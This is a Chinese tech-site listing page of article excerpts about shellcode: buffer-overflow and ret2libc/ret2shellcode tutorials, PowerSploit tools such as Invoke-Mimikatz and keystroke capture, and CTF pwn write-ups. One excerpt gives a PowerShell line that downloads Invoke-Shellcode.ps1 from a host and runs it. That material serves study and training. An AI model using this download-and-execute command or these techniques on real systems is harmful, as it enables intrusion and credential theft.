E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
Shellcode
【基础篇】————10、隐匿攻击之Website Keyword
在DerbyCon3.0期间,MattGraeber和ChrisCampbell介绍了一种使用网站关键字的技术,以便在系统中触发
shellcode
的发布。
FLy_鹏程万里
·
2020-07-30 23:16
【内网渗透】
————基础篇
【基础篇】————20、隐匿攻击之Images
echo'IEX((new-objectnet.webclient).downloadstring("http://192.168.1.171/tmp/Invoke-
Shellcode
.ps1"));Invoke-
Shellcode
-payloadwindows
FLy_鹏程万里
·
2020-07-30 22:37
【内网渗透】
————基础篇
shellcode
之二.Plus2:ret2libc实例
在最后提到ret2libc,原书并没有详细的资源。但理解这个对以后如何绕开不可执行栈(nx-stack)有很大的帮助,鉴于此,我在网络上找到一些相关资料,并进行相应的试验。Thebasicideabehindthe"ReturntoLibc"attackisthateventhoughthestackhasbeenmarked"NonExecutable",itcanstillbeoverwrit
sepnic
·
2020-07-30 16:07
C/C++
Ret2
ShellCode
红颜祸千般柔情相思难解两相若蝶恋花几经浮沉枯骨终是化飞沙简介ret2
shellcode
顾名思义,就是returnto
shellcode
,即让程序中某个函数执行结束后,返回到
shellcode
的地址去执行
钞sir
·
2020-07-30 16:07
Pwn
PWN ret2
shellcode
今天天气阴,来做一下ret2
shellcode
。记录一下。
prettyX
·
2020-07-30 16:25
PWN
使用ret2libc攻击方法绕过数据执行保护
前面介绍的攻击方法大量使用
Shellcode
,核心思想是修改EIP和注入
Shellcode
,在函数返回时跳到
Shellcode
去执行。
海枫
·
2020-07-30 15:59
深入浅出缓冲区溢出攻击
深入浅出缓冲区溢出攻击
如何编写本地
shellcode
好,我们正式开始一步步来编写
shellcode
,结合之前的示例程序,写个打开一个新shell的
shellcode
。在写之前,先介绍编写
shellcode
的一些技巧,特别有用。
海枫
·
2020-07-30 15:28
深入浅出缓冲区溢出攻击
深入浅出缓冲区溢出攻击
Shellcode
中ret调用和call调用函数区别
Shell
Shellcode
中ret调用和call调用函数区别在编写
shellcode
时,我们通常会使用call或者ret来调用执行某些系统函数或者我们自己编写的函数代码。
js0huang
·
2020-07-30 15:25
学习笔记
中级ROP之ret2reg
将寄存器所指向的空间上注入
shellcode
(确保该空间是可以执行的,通常是栈上的)利用思路分析和调试汇编,查看溢出函数返回时哪个寄存器指向缓冲区地址向寄存器指向的缓冲区中注入
shellcode
查找call
西杭
·
2020-07-30 13:24
pwn
与ret2
shellcode
的初相识
害~0x00ret2
shellcode
简介ret2
shellcode
,也就是returnto
shellcode
,在执行完某个函数之后,跳到
shellcode
上,达到getshell的目的。
gclome
·
2020-07-30 13:13
原创文章
走过路过,不要错过的powersploit用法简介!
文章目录01简介02PowerSploit的安装03PowersSploit脚本攻击实战1Invoke-
Shellcode
2Invoke-Dlllnjection3Invoke-Portscan4Invoke-Mimikatz5Get-Keystrokes04
gclome
·
2020-07-30 13:08
工具类
路由器漏洞挖掘之栈溢出 - 反弹shell的payload构造
前言前一篇讲到了ROP链的构造,最后直接使用调用execve函数的
shellcode
就可以直接getshell,但是实际路由器溢出的情况下都不会那么简单。
abc380620175
·
2020-07-30 07:38
2019 安恒周周练西湖论剑特别版 pwn 题目wp
pwn1考点:构造
shellcode
,patch汇编指令IDA查看反汇编,程序的逻辑很简单如,如果直接f5的话IDA可能识别不出来函数,问题出在0x080484CF这个地方,calleax指令识别不出来
abc380620175
·
2020-07-30 07:07
BUU刷题(三)
remote("node3.buuoj.cn","27782")payload=p32(0x0804a02c)+'%11$n'p.sendline(payload)p.interactive()others_
shellcode
playmak3r
·
2020-07-29 23:29
CTF-PWN
pwn-ROP
checksec,提示NXenabled,看看其解释NX/DEP(堆栈不可执行)NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入
shellcode
aitangdao4981
·
2020-07-29 17:28
CTF|逆向工程软件之IDA
是目前最棒的一个静态反编译软件,为众多0day世界的成员和
ShellCode
安全分析人士不可
一个不融化的雪人
·
2020-07-29 11:20
kali的payload的使用攻击之反弹型payload的使用
一、msfvenom命令简介msfvenom是payload产生器,也是
shellcode
代码生成器Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。
红尘卖酒人
·
2020-07-29 11:02
安全扫描与漏洞检测
CTF-Tools 一款CTF古典密码加解密工具
支持的编码解码:URL-UTF-8URL-GB2312UnicodeEscape(%U)HtmlEncodeACSIIBase16Base32Base64Str->Hex
Shellcode
支持的加密解密
浅笑⁹⁹⁶
·
2020-07-29 11:11
渗透工具
Format-String Vulnerability Lab 格式化字符串漏洞 (
shellcode
写进环境变量)
//vul.c/**如果获得环境变量的程序和攻击的程序的文件名长度不一样,环境变量的地址*会发生偏移。因此,要么令两个程序的文件名长度相等(推荐),要么考虑偏*移来计算环境变量地址。*gcc-zexecstack-ogotgot.c*/#include#includeintmain(intargc,char**argv){charbuf[1024];strncpy(buf,argv[1],size
A菱a
·
2020-07-29 07:04
软件安全
绝对牛逼哄哄的
shellcode
内存注入,支持64,32,远程内存注入,支持VMP壳最大强度保护
论坛上内存注入的帖子不止三两个,来来去去也就那样,无非抄来抄去说原创。我也是抄的,不敢说原创,但是牛逼还是说的过去。支持注入任意进程,包括csrss,前提是你能有读写进程内存的权限。看到MemLoadLibrary2注释的人,如果觉得有点熟悉,那你一定老了。哈哈哈,因为这个MemLoadLibrary2的原型,没记错的话,应该是2009年以前的一个memoryloaddll。具体是谁写的我也不懂了
看雪学院
·
2020-07-29 05:12
有趣的
Shellcode
和栈
学弟问了一个ctf-wiki上pwn入门题的知识点,本身没什么意思,但引发的一些小思考感觉还挺好玩的……当然也有可能我作为一个单纯的re狗,pwn题总是被队友秒光了所以没什么写
shellcode
或者ROP
奈沙夜影
·
2020-07-28 23:00
汇编
pwn
CTF
windows编程_远程注入安全
远程注入1.向目标进程中申请内存2.向目标内存中写入
shellcode
(没有特征码,但编码麻烦)3.创建远程线程执行
shellcode
–>dll:获取dll的路径,然后加载dlldll的加载1.静态调用
北风~
·
2020-07-28 23:15
windows编程
xss跨站脚本漏洞总结
也有黑客把xss当做新型的"缓冲区溢出攻击",而javascript是新型的
shellcode
。xss最大的特点就是能注入恶意的代码到用户浏览器的网页上。从而达到劫持用户会话
努力奋斗的小青年
·
2020-07-27 14:14
web渗透笔记总结
PWN头秃之旅 - 4.Retrun-into-libc(攻防世界-level2)
Retrun2libc的前提是NX开启,但ASLR关闭,NX开启后,我们无法执行
shellcode
。Retrun2libc提供了一种绕过思路:修改返回地址,让其指向内存中已有的某个函数。
Sally_Zhang
·
2020-07-23 15:00
动态函数监控技术在缓冲区溢出检测中的应用
同时,对缓冲区溢出
shellcode
进行了分析,用有限状态自动机的模型描述了缓冲区溢出的入侵及检测模型。最后,将缓冲区溢出的检测模型与函数调用监测结合,提出了一种对缓冲区溢出行为进行动态检测的手段。
iiprogram
·
2020-07-16 00:23
security cookie
在微软的c/c++编译器中,增加了对于栈溢出进行检测的参数“/GS”,在调试
shellcode
的时候,发现vs2005产生的code和vc6产生的code有些不同,才让我注意到这个问题。
free2o
·
2020-07-15 23:39
语言和小技巧
如何编写自己的缓冲区溢出利用程序
内容:本文主要讲解有关BufferOverflow的原理,以及结合实战范例介绍Linux和Solaris下的漏洞利用.本文并不介绍如何编写
shellcode
.要求:读者要有一点C和汇编语言基础.目标:希望本文能够尽量做到通熟易懂
TOMMY201112
·
2020-07-15 19:24
ShellCode
可以在http://shell-storm.org的
shellcode
数据库shell-storm.org/
shellcode
/找到一段符合条件的
shellcode
利用msfvenom生成特定条件的
shellcode
https
HAPPYers
·
2020-07-15 14:25
C和C++安全编码笔记:指针诡计
可以通过覆盖函数指针将程序的控制权转移到攻击者提供的外壳代码(
shellcode
)。当程序通过函数指针执行一个函数调用时,攻击者提供的代码将会取代原本希望执行的代码而得到执行。
fengbingchun
·
2020-07-15 13:10
C/C++/C++11
Hackproofing mysql
这是一篇很经典的论文,作者ChrisAnley是
shellcode
handbook的作者之一。
moonnight
·
2020-07-14 09:16
利用MSBuild制作msf免杀的后门
今天看到三好学生对MSBuild的利用,它的好处这里已经说完,http://bobao.360.cn/learning/detail/3046.html,说可以有提供一种直接执行
shellcode
的方法
ZZZJX7
·
2020-07-14 06:36
[Toddler's Bottle]-asm
这题其实就是叫我们自己用汇编写
shellcode
,只能用syscall调用open,readm,write函数来读取flag自己在本地写个执行
shellcode
的demo程序//gcc
shellcode
.c-o
shellcode
-zexecstack-fno-stack-protector
2mpossible
·
2020-07-13 12:46
kali的payload的使用攻击之直连型payload的使用
一、msfvenom命令简介msfvenom是payload产生器,也是
shellcode
代码生成器Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。
红尘卖酒人
·
2020-07-13 12:15
安全扫描与漏洞检测
通过Python实现Payload分离免杀过程详解
缺点:编译成exe以后体积过大实现:msf生成
shellcode
代码:将payload给copy下来,去除引号。
·
2020-07-13 10:23
[原]使用python建立后门
inject.dll;后门构建的一般思路为:重命名(或者移动)A.exe为xxx.exe,然后在backdoor中创建A.exe的进程--记为processA;然后向processA中注入DLL(学艺未精,不会写
shellcode
PandaraWen
·
2020-07-13 09:17
python喜剧
编写自己的缓冲区溢出利用程序
编写自己的缓冲区溢出利用程序内容:本文主要讲解有关BufferOverflow的原理,以及结合实战范例介绍linux和Solaris下的漏洞利用.本文并不介绍如何编写
shellcode
.要求:读者要有一点
lile269
·
2020-07-13 07:53
C/C++
MSF——Meterpreter(三)
Meterpreter是Metasploit提供的一个非常强大的后渗透工具Meterpreter可以看成特殊的Payload,之前我们的Payload都是为了获得目标系统的shell这里的payload就是
shellcode
dishan4749253
·
2020-07-13 04:52
metasploit framework 笔记 | msf5 使用技巧
操作系统类型/漏洞类型/具体漏洞模块名称——指定要使用漏洞利用模块②setSRVHOST攻击源IP③setPAYLOADwindows/meterpreter/reverse_tcp——设置攻击载荷,也就是
shellcode
Interstellar____
·
2020-07-13 00:21
二进制漏洞
技术研究
msf
metasploit
framework
Linux kali虚拟机利用msf框架对win7的永恒之蓝渗透
攻击载荷(payload),是我们期望目标系统在渗透攻击之后去执行的代码
shellcode
,是在渗透攻击时作为攻击载荷运行的一组机器指令,通常用汇编语言编写模块(Module),指Metasploit框架中所使用的一段软件代码组件
waitwind1994
·
2020-07-12 21:57
渗透中POC、EXP、Payload与
Shellcode
的区别
1.POC、EXP、Payload与
Shellcode
POC:全称'ProofofConcept',中文'概念验证',常指一段漏洞证明的代码。
浅浅爱默默
·
2020-07-12 13:02
Kali渗透测试
栈溢出原理与
shellcode
开发
ESP:该指针永远指向系统栈最上面一个栈帧的栈顶EBP:该指针永远指向系统栈最上面一个栈帧的底部01修改函数返回地址#include#include#definePASSWORD"1234567"intverify_password(char*password){intauthenticated;charbuffer[8];authenticated=strcmp(password,PASSWOR
weixin_30902675
·
2020-07-12 07:27
python生成
shellcode
加载器
importctypes,cPickle,base64,urllib2classptr(object):def__reduce__(self):return(eval,("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))#base64classbuf(object):def__init__(self,sh
#Mr.liao
·
2020-07-12 01:48
Python
网络安全
metasploit
Metasploit基础专业术语渗透攻击(exploit)攻击载荷(payload)
shellcode
模块(module)监听器(Listener)Metasploit用户接口MSF终端MSF命令行Metasploit
qq_42902587
·
2020-07-11 20:01
栈溢出几种保护方式
栈溢出主要是通过覆盖栈内保存的函数返回地址eip,然后在EIP处写入
shellcode
地址做的。
groundhappy
·
2020-07-11 06:48
漏洞挖掘
二进制漏洞:从简单栈溢出到写自己编写
shellcode
0x00简介本次主要记录缓冲器溢出的:原理、实现和
shellcode
的编写详细的去理解原理,和底层开始写
shellcode
本次实验的C代码#include#include#definePASSWORD"
god_zZz
·
2020-07-11 06:28
二进制安全研究
栈溢出的几种保护机制
攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止
shellcode
的执行。在Linux中我们将cookie信息称为canary。canary是一
ATFWUS
·
2020-07-10 20:21
CTF-PWN
栈溢出 初级教学
一.初探栈溢出1.1在首先在文件夹里面创建一个c的程序StackOF.c内容如下图#include#includeintmain(){puts("SOplzqivemeyour
shellcode
");charbuffer
Zero_0_0
·
2020-07-10 17:20
献给markdown初学者!
当下的NT内核提供了ASLR,大大提高了进程被inject后
shellcode
run起来的难度;传统NT的ACL模型就不废话了UAC,这货也不扯了EFS和Bitlocker,EFS的易受攻击性已经是被证明的
露华浓
·
2020-07-10 17:20
smbghost_rce复现(cve-2020-0796)
0x00环境靶机:win101903IP:192.168.0.105攻击机:kaliIP:192.168.0.1040x01msfvenom生成reversed
shellcode
msfvenom-ax64
Sn0w33
·
2020-07-10 05:25
漏洞复现
安全
Linux和Windows堆栈溢出利用对比
堆栈溢出的利用,有三大条件,一是返回点的定位,二是
ShellCode
的编写,三是跳转到
ShellCode
。
PolluxAvenger
·
2020-07-10 03:46
Linux
Windows
Hack学习
精华转载
上一页
8
9
10
11
12
13
14
15
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他